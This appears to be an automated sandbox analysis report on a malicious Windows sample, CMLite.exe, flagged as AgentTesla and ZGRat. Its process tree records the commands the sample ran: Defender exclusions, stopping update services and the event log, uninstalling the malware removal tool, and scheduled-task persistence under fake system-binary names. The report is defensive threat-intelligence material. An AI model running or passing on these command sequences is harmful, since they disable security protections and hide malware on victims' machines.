Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    08-05-2024 12:30

General

  • Target

    CMLite.exe

  • Size

    2.3MB

  • MD5

    616a65eb66de1b0218401d55bc36e8b8

  • SHA1

    3c61c3844590cdffe11218fb8f5bb13a5555d52e

  • SHA256

    35bbb997958723a543c906b2c014da4e73d28b935260a58a46c5c09d2920bb89

  • SHA512

    c77ace0d3a8a9dfb5d18e5099b2afef1ad5bc0add6a947fcf1efc8c32be2f8ccab7405bccc8f7514b4f2a884a4c01969e097bf87e724b60effca333628e03004

  • SSDEEP

    49152:C3Iq8lWFDP5E73BgWmU2p77Qqs10y3SryMqf:CMeDPYCWmn5QfbSryMqf

Malware Config

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • Detect ZGRat V1 4 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ZGRat

    ZGRat is a remote access trojan written in C#.

  • AgentTesla payload 1 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Uses powershell.exe to run commands.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 9 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials and other sensitive information.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utility used to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 17 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\CMLite.exe
    "C:\Users\Admin\AppData\Local\Temp\CMLite.exe"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2872
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2632
      • C:\Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe
        "C:\Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe"
        3⤵
        • Executes dropped EXE
        • Enumerates system info in registry
        PID:2780
      • C:\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe
        "C:\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2916
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\BridgeChainserverwinDriver\lWPzR1COw6cbe1Bc3dVzDZxdAD6Pz4jxoWgNKIOPHWBjqt3tHIP3Cr.vbe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2420
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\BridgeChainserverwinDriver\SQvq6Fq.bat" "
            5⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1512
            • C:\BridgeChainserverwinDriver\cmHypersurrogatesavesDhcp.exe
              "C:\BridgeChainserverwinDriver/cmHypersurrogatesavesDhcp.exe"
              6⤵
              • Executes dropped EXE
              • Drops file in Windows directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:880
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\BridgeChainserverwinDriver\services.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:996
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Idle.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:908
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\BridgeChainserverwinDriver\wininit.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:900
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\BridgeChainserverwinDriver\lsass.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:1520
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\ed850442-d104-11ee-9c57-c695cbc44580\dwm.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:2132
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\qju8ggyhS0.bat"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:2932
                • C:\Windows\system32\chcp.com
                  chcp 65001
                  8⤵
                    PID:2924
                  • C:\Windows\system32\w32tm.exe
                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                    8⤵
                      PID:2612
                    • C:\BridgeChainserverwinDriver\services.exe
                      "C:\BridgeChainserverwinDriver\services.exe"
                      8⤵
                      • Executes dropped EXE
                      • Suspicious behavior: GetForegroundWindowSpam
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1672
          • C:\Users\Admin\AppData\Roaming\conhostgm.exe
            "C:\Users\Admin\AppData\Roaming\conhostgm.exe"
            3⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2252
            • C:\Users\Admin\AppData\Roaming\.conhostgm.exe
              "C:\Users\Admin\AppData\Roaming\.conhostgm.exe"
              4⤵
              • Executes dropped EXE
              • Drops file in System32 directory
              PID:2512
              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                5⤵
                • Command and Scripting Interpreter: PowerShell
                PID:2324
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:2284
                • C:\Windows\system32\wusa.exe
                  wusa /uninstall /kb:890830 /quiet /norestart
                  6⤵
                  • Drops file in Windows directory
                  PID:1064
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop UsoSvc
                5⤵
                • Launches sc.exe
                PID:2068
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop WaaSMedicSvc
                5⤵
                • Launches sc.exe
                PID:928
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop wuauserv
                5⤵
                • Launches sc.exe
                PID:2968
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop bits
                5⤵
                • Launches sc.exe
                PID:1788
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop dosvc
                5⤵
                • Launches sc.exe
                PID:852
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                5⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2040
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                5⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1364
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                5⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2160
              • C:\Windows\system32\powercfg.exe
                C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                5⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2224
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe delete "driverupdate"
                5⤵
                • Launches sc.exe
                PID:1128
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
                5⤵
                • Launches sc.exe
                PID:2144
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe stop eventlog
                5⤵
                • Launches sc.exe
                PID:964
              • C:\Windows\system32\sc.exe
                C:\Windows\system32\sc.exe start "driverupdate"
                5⤵
                • Launches sc.exe
                PID:112
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\BridgeChainserverwinDriver\services.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:852
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\BridgeChainserverwinDriver\services.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2012
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\BridgeChainserverwinDriver\services.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2312
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Idle.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1604
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Idle.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1968
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Idle.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1632
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\BridgeChainserverwinDriver\wininit.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1344
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\BridgeChainserverwinDriver\wininit.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1304
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\BridgeChainserverwinDriver\wininit.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:112
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\BridgeChainserverwinDriver\lsass.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:1856
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\BridgeChainserverwinDriver\lsass.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2528
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\BridgeChainserverwinDriver\lsass.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:404
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Recovery\ed850442-d104-11ee-9c57-c695cbc44580\dwm.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2072
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\ed850442-d104-11ee-9c57-c695cbc44580\dwm.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2364
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Recovery\ed850442-d104-11ee-9c57-c695cbc44580\dwm.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Creates scheduled task(s)
        PID:2996
      • C:\ProgramData\VC_redist.x64.exe
        C:\ProgramData\VC_redist.x64.exe
        1⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        PID:2788
        • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious use of AdjustPrivilegeToken
          PID:1100
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:808
          • C:\Windows\system32\wusa.exe
            wusa /uninstall /kb:890830 /quiet /norestart
            3⤵
            • Drops file in Windows directory
            PID:2300
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop UsoSvc
          2⤵
          • Launches sc.exe
          PID:604
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop WaaSMedicSvc
          2⤵
          • Launches sc.exe
          PID:1856
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop wuauserv
          2⤵
          • Launches sc.exe
          PID:2072
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop bits
          2⤵
          • Launches sc.exe
          PID:2924
        • C:\Windows\system32\sc.exe
          C:\Windows\system32\sc.exe stop dosvc
          2⤵
          • Launches sc.exe
          PID:2996
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2976
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1588
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2248
        • C:\Windows\system32\powercfg.exe
          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          2⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2364
        • C:\Windows\system32\conhost.exe
          C:\Windows\system32\conhost.exe
          2⤵
            PID:2768

        Network

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\BridgeChainserverwinDriver\SQvq6Fq.bat

          Filesize

          102B

          MD5

          96b489ae2503e2ab4e18a2b584fad475

          SHA1

          873daaaec0a6978a3f6e9a99bf66dfa388ea8321

          SHA256

          6c5ade02c3d706cf54d5d7e0ce525034179ac3f80866caf615e265737df6f1c1

          SHA512

          9ac4ba04e5bc86aced9fbab34b2564bbd59ff249598a4e4501105ee6a443b0467b2995fdeef49cffd84ca106b6256f21a26e243d4396f0a394c2110b7fe54d52

        • C:\BridgeChainserverwinDriver\lWPzR1COw6cbe1Bc3dVzDZxdAD6Pz4jxoWgNKIOPHWBjqt3tHIP3Cr.vbe

          Filesize

          211B

          MD5

          d4f337599faff375fa8c61471ad7048c

          SHA1

          7bc11cc1588e072698090393875dcf856b874ba1

          SHA256

          10d502ba0315c5fc07e317116ff1dda94b59fe8f6381d75a319a2c7e0891e07a

          SHA512

          6291806cc91e9162a878973b0b02186869fdbb6457fdbf15d6f7b2e538638b3026b66dc5443c8dde0e79d33483aea18e363e711e788c6dab911678bd19a40899

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

          Filesize

          68KB

          MD5

          29f65ba8e88c063813cc50a4ea544e93

          SHA1

          05a7040d5c127e68c25d81cc51271ffb8bef3568

          SHA256

          1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

          SHA512

          e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          29cda902c88afea5e991ad9fe422e7c6

          SHA1

          26075c55563fb2d3b5eb5336256e22c4d0bc1c3f

          SHA256

          2c3ce30f75ae3af261ee7ce83a56246f266836b96fc340990d2c95741fd4b900

          SHA512

          0e502e62032529509b8034939a50be60e231a6dbff2dc03d982c5a10872b3234b17f09dba672826ba01bb7d3eddade0b33391c17465cdc3a86fb0468b8d4ffcb

        • C:\Users\Admin\AppData\Local\Temp\Cab278F.tmp

          Filesize

          65KB

          MD5

          ac05d27423a85adc1622c714f2cb6184

          SHA1

          b0fe2b1abddb97837ea0195be70ab2ff14d43198

          SHA256

          c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

          SHA512

          6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

        • C:\Users\Admin\AppData\Local\Temp\Tar2871.tmp

          Filesize

          177KB

          MD5

          435a9ac180383f9fa094131b173a2f7b

          SHA1

          76944ea657a9db94f9a4bef38f88c46ed4166983

          SHA256

          67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

          SHA512

          1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

        • C:\Users\Admin\AppData\Local\Temp\qju8ggyhS0.bat

          Filesize

          218B

          MD5

          e6ae9b4f6c392beba334b9de21877664

          SHA1

          210f427c3df7d4fe63990e7009b49bed79592adc

          SHA256

          15afc125ab837860b57d4d0b91417a0e9eafb65dcd58b927b4e57a29559e6222

          SHA512

          e82f42b14861c211980d3ca122d40804fdf6e9c4d933f10ddf25b3f51c7669f021dcdbb8b31955a1bcd31a6b8197efe84f86d04ba5ae512fc1e0a4c62d253018

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          7KB

          MD5

          ca9102fff0e1feefa288ff4fd21ecf2a

          SHA1

          1e38043e83399e20728054695faad6f8e529c02e

          SHA256

          cfec127321865aeeee9b80868cb4dd09239ab3260a50e082c142281436a20cc4

          SHA512

          66e58efd069abfa4cce65ed5077ed14d52c9742387707859539f9baf01d0e968abae479303fa3b49cbe87bcf44b813007345bf049b0e1dc946e36cd163a76cd9

        • C:\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe

          Filesize

          2.3MB

          MD5

          322944acd00186c743f6ff097c0db0c6

          SHA1

          a330f89db2367088048022b74be3a2cb67853a61

          SHA256

          aed6159dc2a264fd2fb0c0d20d7816c26741e1fcd517b06ed4726a8ff1e32d5a

          SHA512

          bf1a98a40a94ea180c01dd90610ee434fd555592ca2e21078330493cd4f8b1f401ae3a5bdf1c0beb4d2181b135760a66ac2c73881d7611f57ef6ceba4fa3e7e3

        • \BridgeChainserverwinDriver\cmHypersurrogatesavesDhcp.exe

          Filesize

          2.0MB

          MD5

          2eea3122b5e1a714d45f7718ce3a25e3

          SHA1

          b6d45f1124bf85fd571e6ea9417104b51d539456

          SHA256

          bb8b517b159e137ba92f0ab246630ff36e20fe350056afa75be751fedd634b55

          SHA512

          13c6eedaf9a582d6c02ad478e24a5ae7d66c1195677e8d42541355807336dba09ce736e4539bfe04ce3b98e40aa52c54f457eda6a8b5fd547b784d7c6c89258e

        • \Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe

          Filesize

          977KB

          MD5

          02ea34533272f916fb52990a45917913

          SHA1

          bd68a7c84b7d7a65ab19419ddf6a2a2b44fda0a4

          SHA256

          6dd45a770648da5f5996ac7b28f604493b44f8b1ba7458cf60d3a1ab7cf18590

          SHA512

          352521214ed922b0e3331559d0c6b2af0fc55e4b4077dcf83dbeec08a8f59820c98bbbd795cdd8e2430c835ba7fbb6b19c34572762c7cf6359de05b99ef019a7

        • \Users\Admin\AppData\Roaming\conhostgm.exe

          Filesize

          2.9MB

          MD5

          316fa77cc45d0802155448d648b417b4

          SHA1

          c60be59c3df582030f3bbbf7c93e3f6110a38c82

          SHA256

          dd248b4df3e5b9eac86bbe9fc6f7ef17b0d75738b601267b214a825783d0a2a1

          SHA512

          4f1a4b71bc0d18dd6210c7b55736e2c43cf90f7ed700061a775ceecade3ef2b88c0e122769c5570e5bb2b8453deab6d5ff50ab73ff0fbb1cb9b3475be76c4da9

        • memory/880-123-0x00000000006C0000-0x00000000006DC000-memory.dmp

          Filesize

          112KB

        • memory/880-133-0x00000000007A0000-0x00000000007AE000-memory.dmp

          Filesize

          56KB

        • memory/880-135-0x00000000007B0000-0x00000000007BC000-memory.dmp

          Filesize

          48KB

        • memory/880-119-0x00000000002A0000-0x00000000004A4000-memory.dmp

          Filesize

          2.0MB

        • memory/880-121-0x0000000000290000-0x000000000029E000-memory.dmp

          Filesize

          56KB

        • memory/880-131-0x00000000006F0000-0x00000000006FC000-memory.dmp

          Filesize

          48KB

        • memory/880-125-0x0000000000780000-0x0000000000798000-memory.dmp

          Filesize

          96KB

        • memory/880-129-0x00000000006B0000-0x00000000006BE000-memory.dmp

          Filesize

          56KB

        • memory/880-127-0x00000000006A0000-0x00000000006AE000-memory.dmp

          Filesize

          56KB

        • memory/1100-195-0x0000000000CF0000-0x0000000000CF8000-memory.dmp

          Filesize

          32KB

        • memory/1100-194-0x000000001A020000-0x000000001A302000-memory.dmp

          Filesize

          2.9MB

        • memory/1520-164-0x000000001B490000-0x000000001B772000-memory.dmp

          Filesize

          2.9MB

        • memory/1520-166-0x0000000002980000-0x0000000002988000-memory.dmp

          Filesize

          32KB

        • memory/1672-179-0x0000000000E40000-0x0000000001044000-memory.dmp

          Filesize

          2.0MB

        • memory/2768-215-0x0000000140000000-0x000000014000E000-memory.dmp

          Filesize

          56KB

        • memory/2768-217-0x0000000140000000-0x000000014000E000-memory.dmp

          Filesize

          56KB

        • memory/2768-218-0x0000000140000000-0x000000014000E000-memory.dmp

          Filesize

          56KB

        • memory/2768-212-0x0000000140000000-0x000000014000E000-memory.dmp

          Filesize

          56KB

        • memory/2768-213-0x0000000140000000-0x000000014000E000-memory.dmp

          Filesize

          56KB

        • memory/2768-214-0x0000000140000000-0x000000014000E000-memory.dmp

          Filesize

          56KB

        • memory/2780-101-0x000000001C570000-0x000000001C766000-memory.dmp

          Filesize

          2.0MB

        • memory/2780-98-0x0000000000C00000-0x0000000000CF8000-memory.dmp

          Filesize

          992KB

        • memory/2872-1-0x000000007EBD0000-0x000000007EFA1000-memory.dmp

          Filesize

          3.8MB

        • memory/2872-2-0x0000000000400000-0x0000000000DAC000-memory.dmp

          Filesize

          9.7MB

        • memory/2872-0-0x0000000000400000-0x0000000000DAC000-memory.dmp

          Filesize

          9.7MB

        • memory/2872-3-0x000000007EBD0000-0x000000007EFA1000-memory.dmp

          Filesize

          3.8MB